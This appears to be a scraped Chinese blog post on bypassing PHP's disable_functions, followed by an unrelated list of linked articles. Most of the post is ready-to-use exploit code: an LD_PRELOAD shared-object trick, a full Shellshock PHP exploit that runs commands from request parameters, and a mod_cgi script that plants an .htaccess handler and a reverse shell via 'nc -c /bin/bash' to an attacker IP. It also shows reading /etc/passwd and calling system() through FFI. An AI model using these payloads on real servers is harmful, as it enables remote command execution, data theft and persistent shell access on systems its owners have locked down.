lonmar~
lonmar~

bypass disable_function

文章目录

    • 0x01 LD_PRELOAD
    • 0x02 ShellShock
    • 0x03 Apache Mod CGI
    • 0x04 PHP-FPM
    • 0x05 UAF
      • Json Serializer UAF
      • GC UAF
      • Backtrace UAF
    • 0x06 FFI扩展
    • 0x07 ImageMagick
    • 0x08 COM组件

主要参考https://www.anquanke.com/post/id/208451

0x01 LD_PRELOAD

LD_PRELOAD是什么 : 参考 警惕UNIX下的LD_PRELOAD环境变量 https://blog.csdn.net/haoel/article/details/1602108

绕过原理: https://blog.csdn.net/weixin_33738982/article/details/87979967

攻击思路:
1. 有上传权限,上传特定的PHP脚本,hack.so等
2. 上传自定义的动态链接库文件 hack.so ( 查看未封禁函数的加载函数 如readelf -s /usr/sbin/sendmail ,再改写重名函数)

php脚本参考( 根据mail()函数攻击 )



putenv("LD_PRELOAD=/var/www/hack.so");
mail("[email protected]","","","","");

hack.so源文件

#!c
#include 
#include 
#include  
 
void payload() {
        system("rm /tmp/check.txt");
}   
 
int  geteuid() {
if (getenv("LD_PRELOAD") == NULL) { return 0; }
unsetenv("LD_PRELOAD");
payload();
}

0x02 ShellShock

利用bash破壳漏洞(CVE-2014-6271),该漏洞存在于bash 1.14 – 4.3版本中
exp.php ,上传利用即可 ?cmd=xxx

 
# Exploit Title: PHP 5.x Shellshock Exploit (bypass disable_functions) 
# Google Dork: none 
# Date: 10/31/2014 
# Exploit Author: Ryan King (Starfall) 
# Vendor Homepage: http://php.net 
# Software Link: http://php.net/get/php-5.6.2.tar.bz2/from/a/mirror 
# Version: 5.* (tested on 5.6.2) 
# Tested on: Debian 7 and CentOS 5 and 6 
# CVE: CVE-2014-6271 

function shellshock($cmd) { // Execute a command via CVE-2014-6271 @mail.c:283 
   $tmp = tempnam(".","data"); 
   putenv("PHP_LOL=() { x; }; $cmd >$tmp 2>&1"); 
   // In Safe Mode, the user may only alter environment variableswhose names 
   // begin with the prefixes supplied by this directive. 
   // By default, users will only be able to set environment variablesthat 
   // begin with PHP_ (e.g. PHP_FOO=BAR). Note: if this directive isempty, 
   // PHP will let the user modify ANY environment variable! 
   //mail("[email protected]","","","","-bv"); // -bv so we don't actuallysend any mail 
   error_log('a',1);
   $output = @file_get_contents($tmp); 
   @unlink($tmp); 
   if($output != "") return $output; 
   else return "No output, or not vuln."; 
} 
echo shellshock($_REQUEST["cmd"]); 
?>

0x03 Apache Mod CGI

禁用 putenv 也可以利用

利用条件:

目录下有写权限
apache 使用 apache_mod_php
Web 目录给了 AllowOverride 权限
启用了mod_cgi

上传.htaccess

Options +ExecCGI
AddHandler cgi-script .test

在上传shell.test

#!/bin/bash
echo&&cat /etc/passwd

然后访问shell.test

exp脚本


$cmd = "nc -c '/bin/bash' xxx.xx.xx.xx 4444"; //command to be executed
$shellfile = "#!/bin/bashn"; //using a shellscript
$shellfile .= "echo -ne "Content-Type: text/html\n\n"n"; //header is needed, otherwise a 500 error is thrown when there is output
$shellfile .= "$cmd"; //executing $cmd
function checkEnabled($text,$condition,$yes,$no) //this surely can be shorter
{
    echo "$text: " . ($condition ? $yes : $no) . "
n";
}
if (!isset($_GET['checked']))
{
    @file_put_contents('.htaccess', "nSetEnv HTACCESS on", FILE_APPEND); //Append it to a .htaccess file to see whether .htaccess is allowed
    header('Location: ' . $_SERVER['PHP_SELF'] . '?checked=true'); //execute the script again to see if the htaccess test worked
}
else
{
    $modcgi = in_array('mod_cgi', apache_get_modules()); // mod_cgi enabled?
    $writable = is_writable('.'); //current dir writable?
    $htaccess = !empty($_SERVER['HTACCESS']); //htaccess enabled?
        checkEnabled("Mod-Cgi enabled",$modcgi,"Yes","No");
        checkEnabled("Is writable",$writable,"Yes","No");
        checkEnabled("htaccess working",$htaccess,"Yes","No");
    if(!($modcgi && $writable && $htaccess))
    {
        echo "Error. All of the above must be true for the script to work!"; //abort if not
    }
    else
    {
        checkEnabled("Backing up .htaccess",copy(".htaccess",".htaccess.bak"),"Suceeded! Saved in .htaccess.bak","Failed!"); //make a backup, cause you never know.
        checkEnabled("Write .htaccess file",file_put_contents('.htaccess',"Options +ExecCGInAddHandler cgi-script .dizzle"),"Succeeded!","Failed!"); //.dizzle is a nice extension
        checkEnabled("Write shell file",file_put_contents('shell.dizzle',$shellfile),"Succeeded!","Failed!"); //write the file
        checkEnabled("Chmod 777",chmod("shell.dizzle",0777),"Succeeded!","Failed!"); //rwx
        echo "Executing the script now. Check your listener "; //call the script
    }
}
?>

0x04 PHP-FPM

https://www.anquanke.com/post/id/208451#h2-4

0x05 UAF

Json Serializer UAF

利用json序列化中的堆溢出触发,借以绕过disable_function,影响范围:
7.1 – all versions to date
7.2 < 7.2.19 (released: 30 May 2019)
7.3 < 7.3.6 (released: 30 May 2019)

GC UAF

利用的是PHP garbage collector程序中的堆溢出触发,影响范围为7.0-1.3

Backtrace UAF

影响版本是7.0-7.4

exp : https://www.anquanke.com/post/id/208451#h2-8

0x06 FFI扩展

条件: php>7.4,开启了FFI扩展ffi.enable=true,我们可以通过FFI来调用C中的system进而达到执行命令的目的

exp:


$ffi = FFI::cdef("int system(const char *command);");
$ffi->system("whoami >/tmp/1");
echo file_get_contents("/tmp/1");
@unlink("/tmp/1");
?>

访问即可获得返回结果

0x07 ImageMagick

0x08 COM组件

待补充

你可能感兴趣的:(bypass disable_function)

  • Chrome with proxy the 8th dwarf chrome前端
    命令行默认直接打开Chrome是没有代理的,但命令行可以指定代理:--no-proxy-server--proxy-auto-detect--proxy-bypass-list=XXX--proxy-pac-url=XXX--proxy-server=XXXMacOS中使用方法:$open-a/Applications/Google\Chrome.app/--args--proxy-server=
  • KVM虚拟机命令行常用操作 文静小土豆 linux运维redis
    1,首先验证CPU是否支持虚拟化,输入有vmx或svm就支持,支持虚拟化则就支持KVMcat/proc/cpuinfo|egrep'vmx|svm'2,查看KVM模块是否加载lsmod|grepkvm#kvm_intel1700860#kvm5663401kvm_intel#irqbypass135031kvm3,安装KVM虚拟机yum-yinstallqemu-kvmqemu-imglibvir
  • 探索iCloud-Bypass:解锁新可能的实用工具 杭律沛Meris
    探索iCloud-Bypass:解锁新可能的实用工具项目介绍iCloud-Bypass是一个专为解锁iTunes界面而设计的开源脚本。该项目由一位热衷于技术的开发者创建,旨在帮助用户解决与iCloud账户相关的锁定问题,让用户能够重新获得对设备的控制权。虽然目前仍在发展中,但这个创新的解决方案已引起了不少关注,并期待社区的建议和贡献。项目技术分析该脚本的核心是通过一种安全且非侵入性的方法来规避iC
  • Python调用OpenAI接口报错OpenAIError 红狐九尾 pythonpythonai人工智能
    有人说Python和AI是天生一对,那就试试Python调用OpenAI吧。安装好Python的开发环境,安装好OpenAI(cmd下运行命令:pipinstallOpenAI)不出意外的,Python调用OpenAI接口报错OpenAIError,具体信息:openai.OpenAIError:Theapi_keyclientoptionmustbeseteitherbypassingapi_k
  • [套路] 浏览器引入Vue.js场景-WangEditor富文本编辑器的使用 (永久免费) Grandpa_Rick 套路frontendvue.js前端javascriptwangEditor
    系列文章目录[套路]el-table多选属性实现单选效果[套路]基于服务内存实现的中文拼音混合查询[套路]Bypass滑块验证码目录系列文章目录前言一、实现1.1场景1.2Window对象简介1.3引入WangEditor1.4页面配置前言公司使用freemarker的老旧SpringBootWeb后台项目,前两年通过浏览器引入js的方式使用Vue简单升级了下,方便迭代功能.近期一个很简单的功能需
  • Nodejs Playwright 2Captcha 验证码识别实现自动登陆 openHacking
    原文:https://lwebapp.com/zh/post/bypass-captcha需求日常工作当中,为了提高工作效率,我们可能会写脚本来自动执行任务。有些网站因为需要用户登陆,所以脚本的自动登陆功能必不可少。不过我们在登陆网站的时候经常会出现验证码,验证码的目的就是为了防止机器登陆、自动化脚本操作,那么有没有办法让脚本能自动识别验证码实现登陆呢?接下来我以B站为例给大家讲解下,如何解决自动
  • Windows激活时跳过联网功能 做咩啊~ Windows桌面问题windows
    Windows激活时跳过联网功能遇到需要联网的页面时,按下“Shift+F10”或“FN+Shift+F10”开启CMD窗口,然后输入“oobe\BypassNRO.cmd”,完成后回车回车后系统会重启重启后,在联网页面右下角点击“我没有Intelnet连接”然后点击‘继续执行受限设置’即可
  • HGAME 2024 WEEK 1:web Bypass it bK_Rose 网络安全
    题目页面:本题的名字叫Bypassit,大家初步想的可能是绕过,就是万能密码啊或者万能账号什么的绕过这个登录系统大家可以尝试一下万能密码登录先!!!(反正flag不是这里搞出来的)但是多尝试!!!!!我带你们试一下初步的账号:admin密码:1or1=1#大家可能也觉得是万能账号?我也来试一下这里也不太行目录扫描也扫不出什么东西的我们尝试一下注册账号!!!竟然不给???抓个包看看....,前面没演
  • HGAME 2024 WEEK1 WP 是Mumuzi ctf信息安全
    文章目录WEBezHTTPBypassitSelectCourses2048*16jhatREezASMezPYCezUPXezIDAPWNEzSignInCRYPTO奇怪的图片ezRSAezMathezPRNGMISCSignIn来自星尘的问候simple_attack希儿希儿希尔签到放假比较闲,打打比赛WEBezHTTP来自vidar.club、UA要求阿巴阿巴阿巴、来自本地(提示不是XFF,
  • vs 开发者powershell安装git tenc1239 vsgit
    在VS开发者PowerShell中安装Git的方法是:1.打开VS开发者PowerShell2.运行以下命令安装chocolatey(一个Windows包管理器):Set-ExecutionPolicyBypass-ScopeProcess-Force;[System.Net.ServicePointManager]::SecurityProtocol=[System.Net.ServicePoi
  • securityoverridehacking challenge 解题思路汇总——JavaScript captain_hwz securityjavascript安全ctf
    通过了Advanced部分(securityoverridehackingchallenge解题思路汇总——Advanced),下面就进入JavaScript了。总的来说,这个部分比较简单,因为JavaScript是高度可控的东西。也就是说,安全角度而言,JavaScript是不可信的。4Javascript4.1LoginBypass这题比较容易让人想多,逛了下hint,发现很简单。观察,首先请
  • 24个已知403绕过方法的利用脚本 网络安全进阶 渗透测试工具web安全渗透测试信息安全网络安全CISSP
    介绍一个简单的脚本,仅供自用,用于绕过403在curl的帮助下使用24个已知的403绕过方法它还可用于比较各种条件下的响应,如下图所示用法./bypass-403.shhttps://example.comadmin./bypass-403.shwebsite-herepath-here安装gitclonehttps://github.com/iamj0ker/bypass-403cdbypass
  • Nginx 面试分享(十):缓存集成 之乎者也· Nginx内容分享nginx缓存
    目录缓存的概念Web缓存服务缓存设置相关指令proxy_cache_pathproxy_cacheproxy_cache_keyproxy_cache_validproxy_cache_min_usesproxy_cache_methods缓存设置案例需求分析步骤实现缓存的删除删除缓存目录ngx_cache_purge删除资源不缓存proxy_no_cacheproxy_cache_bypass常
  • Hgame week1 web zmjjtt CTFctfweb
    1.Bypassit不准注册,禁用一下js成功注册登录拿到flag2.ezHTTP跟着提示走就行jwt解析一下3.点击选课发包时候显示已满一直发包就会选上每个都一直发包最后就可以全选课成功后来得知是后天每隔一段时间会放出一些课,一直发包就能在放课的时候选到课了4.2048*16右键,F12都被禁,直接开发者工具可以看到源码可以看到好多base64字符串,猜测base64加密了flag发现两个比较长
  • CTF练习1 0e1G7 经验分享安全web安全
    BUGKU题目ezbypass参考自己之前写的博客:RCE挑战(自增的学习)·语雀挺典型的一道无字母数字webshell的题目,可以值得再研究下测试后还有这些字符可以用post方式传入payload:code=$_=(_/_._)[_];$_++;$__=$_.$_++;$_++;$_++;$_++;$__=$__.$_;$_++;$__=$__.$_;$_=_.$__;$$_[_]($$_[__
  • 红日三打靶!!! 郑居中3.0 红日安全红日三靶机Gaara靶机redispythoneclipse
    红日三,黑盒测试环境搭建一.外网打点1.网段探测2.端口服务扫描3.目录扫描4.网站漏洞扫描5.汇总,找破绽6.登陆MySQL改密码7.进入后台,找能写马的地方8.蚁剑连接9.disable_functions绕过1.蚁剑插件绕过2.bypass_disablefunc_via_LD_PRELOAD绕过10.分析11.ssh连接二.脏牛提权三.拿root用户的meterpreter1.msfven
  • 1.30知识回顾&&SQL注入Bypass [email protected] sql数据库
    不知不觉就一月三十日了,感觉摆着摆着就要开学了,开学的你belike:1.SQL注入GetShellsql注入其实是可以getshell的下面我们就来看一下它的两种类型1.intodumpfile要能实现这个getshell,需要满足以下条件该用户为root权限其配置secure_file_priv需要为空知道能访问得到的绝对路径于是我们就拿sqli的第二关为例我们这样构造pocunionsele
  • sqli靶场完结篇!!!! [email protected] sql数据库sql注入
    靶场,靶场,一个靶场打一天,又是和waf斗智斗勇的一天,waf我和你拼啦!!31.多个)号先是一套基本的判断,发现是字符型,然后发现好像他什么都不过滤?于是开始poc321313132"+union+select+2,user(),"2于是你就会又见到熟悉的朋友,于是就能猜到又有)(这种东西换句poc?发现就能成功bypasss321313132")+union+select+2,user(),(
  • OSDI 2023: Userspace Bypass Accelerating Syscall-intensive Applications 结构化文摘 操作系统用户态内核硬件兼容分层架构存储结构
    我们使用以下6个分类标准对本文的研究选题进行分析:1.方法:**系统调用消除:**专注于完全消除I/O路径中的系统调用(例如DPDK、UserspaceBypass)。**系统调用优化:**在不完全消除的情况下,旨在降低系统调用的成本(例如io_uring、F-Stack)。**替代执行模型:**探索使用用户空间或微内核等不同执行环境来绕过系统调用(例如QEMU、Unikernels)。2.应用重
  • sqli.bypass靶场本地小皮环境(1-5关) 沧海一粟@星火燎原 数据库oracle
    1、第一关http://sqli.bypass/index1.php单引号报错id=1'双引号正常id=1'',应该是单引号闭合id=1'--+注释符用不了,%20和+都用不了%0a可以用没有报错,用布尔盲注,POC:id=1'%0aand%0asubstr('ss',1,1)='s'%0aand%0a'1'='1脚本跑数据比较方便importstringfromtimeimporttime,sl
  • sql注入之bypass Z时代.bug(゜▽゜*) 理论sql数据库
    2023.2.1Ps:bypass更多的还是靠个人经验,以下只是个人经验分享,并不绝对和完整,还请在实战中积累属于自己的bypass体系ጿኈቼዽጿኈቼዽጿኈቼዽጿኈቼዽጿኈቼ过滤符号(等效替换)可以尝试使用示例备注=,97likedatabase()like'a%'rlike,regexpdatabase()rlike'^a'正则写法与java一致inmid(database(),1,1)in('
  • yii可逆加密解密 willeny
    生成随机数方法:generateRandomString用法:$key=Yii::$app->security->generateRandomString();加密方法:encryptByPassword用法:$password_hash=Yii::$app->getSecurity()->encryptByPassword($password,$key)参数说明:参数类型备注$passwords
  • 用免费软件分流抢票Bypass辅助购买火车票的亲测可用方法 疯狂学习GIS 计算机高效操作车票火车票购票软件第三方购票免费抢票软件12306软件工具
      本文介绍基于分流抢票(Bypass)软件,协助购买预售、已开售或候补等各类状态的火车票的方法。  最近几天一直没有顾得上看过年回家的火车票,导致错过了回家车票的开售时间,所以当时就直接去12306的官方网站候补了;结果过了几天,依然没有候补到票。后来,朋友推荐了这个分流抢票(Bypass)软件,说亲测好用,我就下载、尝试了一下。  首先,回家的票,我是在用这个软件搜索车次、准备开抢的时候,突然
  • 关于bypassuac的探究——基础知识 网安星星 网络安全学习
    用户帐户控制(UserAccountControl)是WindowsVista(及更高版本操作系统)中一组新的基础结构技术,可以帮助阻止恶意程序(有时也称为“恶意软件”)损坏系统,同时也可以帮助组织部署更易于管理的平台。使用UAC,应用程序和任务总是在非管理员帐户的安全上下文中运行,但管理员专门给系统授予管理员级别的访问权限时除外。UAC会阻止未经授权应用程序的自动安装,防止无意中对系统设置进行更
  • 关于bypassuac的探究——挖掘白名单的uac程序 网安星星 网络安全学习
    有一些系统程序是会直接获取管理员权限同时不弹出UAC弹窗,这类程序被称为白名单程序。这些程序拥有autoElevate属性的值为True,会在启动时就静默提升权限。那么我们要寻找的uac程序需要符合以下几个要求:1. 程序的manifest标识的配置属性 autoElevate 为true2. 程序不弹出UAC弹窗3. 从注册表里查询Shell\Open\command键值对首先是寻找autoEl
  • 关于bypassuac的探究——uac程序特性探究 网安星星 windows网络安全学习
    通常以shell\open\command命名的键值对存储的是可执行文件的路径,如果exe程序运行的时候找到该键值对,就会运行该键值对的程序,而因为exe运行的时候是静默提升了权限,所以运行的该键值对的程序就已经过了uac。所以我们把恶意的exe路径写入该键值对,那么就能够过uac执行我们的恶意exe。这里使用proc监听ComputerDefaults.exe发现他会去查询HKCU\Softwa
  • 关于bypassuac的探究——bypass的实现 网安星星 网络安全学习
    经过前面的探究过后,我们整理下思路,首先要创建注册表,并添加DelegateExecute这个键值对,并修改command的指向exe路径即可bypassuac,那么这里用到一下几个函数RegCreateKeyExA首先是创建注册表项,对应的是之前创建HKCU\Software\Classes\ms-settings\Shell\Open\command这个路径的操作,这个路径默认情况下是不存在的
  • ETW Bypass 网安Dokii 网络安全
    1.NET程序集像Java是由JVM托管的,.NET程序集(比如C_Sharp.exe)都是由CLR托管的硬盘加载从硬盘中读取加载到内存通过三个接口可以启动CLR来对.NET程序集进行硬盘加载CopyICLRMetaHost 接口ICLRRuntimeInfo 接口ICLRRuntimeHost 接口Program.cs:Copyusing System;using System.Collecti
  • windows 11安装跳过联网,使用本地账户登陆 ImSEten windows
    windows11安装跳过联网,使用本地账户登陆第一步断开网络,拔网线第二步安装windows11第三步shift+F10调出命令行第四步输入命令:OOBE\BYPASSNRO回车自动重启,随后继续安装选择我没有网络,即可跳过windows账户登陆,可以创建本地账户。
  • 汽车标定技术(十七)--Bypass的前世今生 CyberSecurity_zhang 汽车标定技术汽车XCPBypass标定
    目录1.Bypass的诞生2.Bypass的发扬光大2.1基于XCP的Bypassing2.2基于Debug的Bypass2.3小结3.Bypass的实际应用1.Bypass的诞生下图我相信只要用过INCA的朋友都非常熟悉。这是远古时期(2000年左右?我猜)ETAS针对发动机控制参数标定设计的一种并行数据访问专利技术:ETK(德语:Emulatortastkopf)。在当时做发动机控制参数标定,
  • jquery实现的jsonp掉java后台 知了ing javajsonpjquery
    什么是JSONP? 先说说JSONP是怎么产生的: 其实网上关于JSONP的讲解有很多,但却千篇一律,而且云里雾里,对于很多刚接触的人来讲理解起来有些困难,小可不才,试着用自己的方式来阐释一下这个问题,看看是否有帮助。 1、一个众所周知的问题,Ajax直接请求普通文件存在跨域无权限访问的问题,甭管你是静态页面、动态网页、web服务、WCF,只要是跨域请求,一律不准; 2、
  • Struts2学习笔记 caoyong struts2
    SSH : Spring + Struts2 + Hibernate 三层架构(表示层,业务逻辑层,数据访问层) MVC模式 (Model View Controller) 分层原则:单向依赖,接口耦合 1、Struts2  =  Struts  + Webwork 2、搭建struts2开发环境    a>、到www.apac
  • SpringMVC学习之后台往前台传值方法 满城风雨近重阳 springMVC
    springMVC控制器往前台传值的方法有以下几种: 1.ModelAndView    通过往ModelAndView中存放viewName:目标地址和attribute参数来实现传参:      ModelAndView mv=new ModelAndView();  mv.setViewName="success
  • WebService存在的必要性? 一炮送你回车库 webservice
    做Java的经常在选择Webservice框架上徘徊很久,Axis  Xfire Axis2 CXF ,他们只有一个功能,发布HTTP服务然后用XML做数据传输。 是的,他们就做了两个功能,发布一个http服务让客户端或者浏览器连接,接收xml参数并发送xml结果。 当在不同的平台间传输数据时,就需要一个都能解析的数据格式。 但是为什么要使用xml呢?不能使json或者其他通用数据
  • js年份下拉框 3213213333332132 java web ee
    <div id="divValue">test...</div>测试 //年份 <select id="year"></select> <script type="text/javascript"> window.onload =
  • 简单链式调用的实现技术 归来朝歌 方法调用链式反应编程思想
    在编程中,我们可以经常遇到这样一种场景:一个实例不断调用它自身的方法,像一条链条一样进行调用 这样的调用你可能在Ajax中,在页面中添加标签: $("<p>").append($("<span>").text(list[i].name)).appendTo("#result");   也可能在HQ
  • JAVA调用.net 发布的webservice 接口 darkranger webservice
    /** * @Title: callInvoke * @Description: TODO(调用接口公共方法) * @param @param url 地址 * @param @param method 方法 * @param @param pama 参数 * @param @return * @param @throws BusinessException
  • Javascript模糊查找 | 第一章 循环不能不重视。 aijuans Way
    最近受我的朋友委托用js+HTML做一个像手册一样的程序,里面要有可展开的大纲,模糊查找等功能。我这个人说实在的懒,本来是不愿意的,但想起了父亲以前教我要给朋友搞好关系,再加上这也可以巩固自己的js技术,于是就开始开发这个程序,没想到却出了点小问题,我做的查找只能绝对查找。具体的js代码如下: function search(){ var arr=new Array("my
  • 狼和羊,该怎么抉择 atongyeye 工作
    狼和羊,该怎么抉择 在做一个链家的小项目,只有我和另外一个同事两个人负责,各负责一部分接口,我的接口写完,并全部测联调试通过。所以工作就剩下一下细枝末节的,工作就轻松很多。每天会帮另一个同事测试一些功能点,协助他完成一些业务型不强的工作。 今天早上到公司没多久,领导就在QQ上给我发信息,让我多协助同事测试,让我积极主动些,有点责任心等等,我听了这话,心里面立马凉半截,首先一个领导轻易说
  • 读取android系统的联系人拨号 百合不是茶 androidsqlite数据库内容提供者系统服务的使用
           联系人的姓名和号码是保存在不同的表中,不要一下子把号码查询来,我开始就是把姓名和电话同时查询出来的,导致系统非常的慢   关键代码:     1, 使用javabean操作存储读取到的数据 package com.example.bean; /** * * @author Admini
  • ORACLE自定义异常 bijian1013 数据库自定义异常
    实例: CREATE OR REPLACE PROCEDURE test_Exception ( ParameterA IN varchar2, ParameterB IN varchar2, ErrorCode OUT varchar2 --返回值,错误编码 ) AS /*以下是一些变量的定义*/ V1 NUMBER; V2 nvarc
  • 查看端号使用情况 征客丶 windows
    一、查看端口 在windows命令行窗口下执行: >netstat -aon|findstr "8080" 显示结果: TCP     127.0.0.1:80         0.0.0.0:0    &
  • 【Spark二十】运行Spark Streaming的NetworkWordCount实例 bit1129 wordcount
    Spark Streaming简介   NetworkWordCount代码   /* * Licensed to the Apache Software Foundation (ASF) under one or more * contributor license agreements. See the NOTICE file distributed with
  • Struts2 与 SpringMVC的比较 BlueSkator struts2spring mvc
    1. 机制:spring mvc的入口是servlet,而struts2是filter,这样就导致了二者的机制不同。 2. 性能:spring会稍微比struts快。spring mvc是基于方法的设计,而sturts是基于类,每次发一次请求都会实例一个action,每个action都会被注入属性,而spring基于方法,粒度更细,但要小心把握像在servlet控制数据一样。spring
  • Hibernate在更新时,是可以不用session的update方法的(转帖) BreakingBad Hibernateupdate
    地址:http://blog.csdn.net/plpblue/article/details/9304459 public void synDevNameWithItil() {Session session = null;Transaction tr = null;try{session = HibernateUtil.getSession();tr = session.beginTran
  • 读《研磨设计模式》-代码笔记-观察者模式 bylijinnan java设计模式
    声明: 本文只为方便我个人查阅和理解,详细的分析以及源代码请移步 原作者的博客http://chjavach.iteye.com/ import java.util.ArrayList; import java.util.List; import java.util.Observable; import java.util.Observer; /** * “观
  • 重置MySQL密码 chenhbc mysql重置密码忘记密码
    如果你也像我这么健忘,把MySQL的密码搞忘记了,经过下面几个步骤就可以重置了(以Windows为例,Linux/Unix类似): 1、关闭MySQL服务 2、打开CMD,进入MySQL安装目录的bin目录下,以跳过权限检查的方式启动MySQL mysqld --skip-grant-tables  3、新开一个CMD窗口,进入MySQL mysql -uroot  
  • 再谈系统论,控制论和信息论 comsci 设计模式生物能源企业应用领域模型
                               再谈系统论,控制论和信息论     偶然看
  • oracle moving window size与 AWR retention period关系 daizj oracle
    转自: http://tomszrp.itpub.net/post/11835/494147 晚上在做11gR1的一个awrrpt报告时,顺便想调整一下AWR snapshot的保留时间,结果遇到了ORA-13541这样的错误.下面是这个问题的发生和解决过程. SQL> select * from v$version; BANNER -------------------
  • Python版B树 dieslrae python
    话说以前的树都用java写的,最近发现python有点生疏了,于是用python写了个B树实现,B树在索引领域用得还是蛮多了,如果没记错mysql的默认索引好像就是B树... 首先是数据实体对象,很简单,只存放key,value class Entity(object): '''数据实体''' def __init__(self,key,value)
  • C语言冒泡排序 dcj3sjt126com 算法
    代码示例: # include <stdio.h> //冒泡排序 void sort(int * a, int len) { int i, j, t; for (i=0; i<len-1; i++) { for (j=0; j<len-1-i; j++) { if (a[j] > a[j+1]) // >表示升序
  • 自定义导航栏样式 dcj3sjt126com 自定义
    -(void)setupAppAppearance { [[UILabel appearance] setFont:[UIFont fontWithName:@"FZLTHK—GBK1-0" size:20]]; [UIButton appearance].titleLabel.font =[UIFont fontWithName:@"FZLTH
  • 11.性能优化-优化-JVM参数总结 frank1234 jvm参数性能优化
    1.堆 -Xms --初始堆大小 -Xmx --最大堆大小 -Xmn --新生代大小 -Xss --线程栈大小 -XX:PermSize  --永久代初始大小 -XX:MaxPermSize  --永久代最大值 -XX:SurvivorRatio --新生代和suvivor比例,默认为8 -XX:TargetSurvivorRatio --survivor可使用
  • nginx日志分割 for linux HarborChung nginxlinux脚本
    nginx日志分割 for linux 默认情况下,nginx是不分割访问日志的,久而久之,网站的日志文件将会越来越大,占用空间不说,如果有问题要查看网站的日志的话,庞大的文件也将很难打开,于是便有了下面的脚本   使用方法,先将以下脚本保存为 cutlog.sh,放在/root 目录下,然后给予此脚本执行的权限   复制代码代码如下: chmo
  • Spring4新特性——泛型限定式依赖注入 jinnianshilongnian springspring4泛型式依赖注入
    Spring4新特性——泛型限定式依赖注入 Spring4新特性——核心容器的其他改进 Spring4新特性——Web开发的增强 Spring4新特性——集成Bean Validation 1.1(JSR-349)到SpringMVC  Spring4新特性——Groovy Bean定义DSL Spring4新特性——更好的Java泛型操作API  Spring4新
  • centOS安装GCC和G++ liuxihope centosgcc
    Centos支持yum安装,安装软件一般格式为yum install .......,注意安装时要先成为root用户。 按照这个思路,我想安装过程如下: 安装gcc:yum install gcc 安装g++: yum install g++ 实际操作过程发现,只能有gcc安装成功,而g++安装失败,提示g++ command not found。上网查了一下,正确安装应该
  • 第13章 Ajax进阶(上) onestopweb Ajax
    index.html <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/
  • How to determine BusinessObjects service pack and fix pack blueoxygen BO
    http://bukhantsov.org/2011/08/how-to-determine-businessobjects-service-pack-and-fix-pack/   The table below is helpful. Reference   BOE XI 3.x 12.0.0. y BOE XI 3.0 12.0. x. y BO
  • Oracle里的自增字段设置 tomcat_oracle oracle
     大家都知道吧,这很坑,尤其是用惯了mysql里的自增字段设置,结果oracle里面没有的。oh,no   我用的是12c版本的,它有一个新特性,可以这样设置自增序列,在创建表是,把id设置为自增序列 create table t ( id       number generated by default as identity (start with 1 increment b
  • Spring Security(01)——初体验 yang_winnie springSecurity
    Spring Security(01)——初体验     博客分类: spring Security Spring Security入门安全认证        首先我们为Spring Security专门建立一个Spring的配置文件,该文件就专门用来作为Spring Security的配置
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他